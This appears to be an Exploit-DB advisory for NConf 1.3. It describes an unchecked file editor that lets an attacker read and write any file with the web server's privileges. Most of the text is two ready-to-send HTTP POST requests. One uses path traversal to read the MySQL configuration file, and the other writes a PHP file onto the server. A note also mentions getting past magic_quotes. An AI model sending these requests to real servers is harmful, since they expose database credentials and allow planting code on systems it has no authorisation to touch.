NConf 1.3 - Arbitrary File Creation

EDB-ID:

24270

CVE:



Author:

haidao

Type:

webapps


Platform:

PHP

Date:

2013-01-21


# Exploit Title:  nconf  file read and wrtite exploit 
# Date: 2013/1/20
# Exploit Author: haidao,54haidao@gmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Version:    nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos)  PHP/5.3.3
 

nconf can modify the config file of nagios and save it to the server,but haven't check the file's direction and name  ,so we can  read and write any files in the server under the privileges of apache,

1,read the file or direction , change the directory or filename ,when filename is null , you get a list of the directory,

POST /nconf/static_file_editor.php HTTP/1.1
Host: 192.168.110.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.110.130/nconf/static_file_editor.php
Cookie: Cacti=0aj6jgsl3a61grcnmnl74pa9o6; PHPSESSID=2ss1u9lqeukh63i4khplveoh07
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
 
directory=static_cfg&filename=../config/mysql.php



2, write the content into the file .
attation: if the magic_quote is on ,, u must attation the ' and ",of course we can bypass it .

POST /nconf/static_file_editor.php HTTP/1.1
Host: 192.168.110.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.110.130/nconf/static_file_editor.php
Cookie: Cacti=0aj6jgsl3a61grcnmnl74pa9o6; PHPSESSID=2ss1u9lqeukh63i4khplveoh07
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
 
directory=static_cfg&filename=s.php&action=Save&content=<?php phpinfo();?>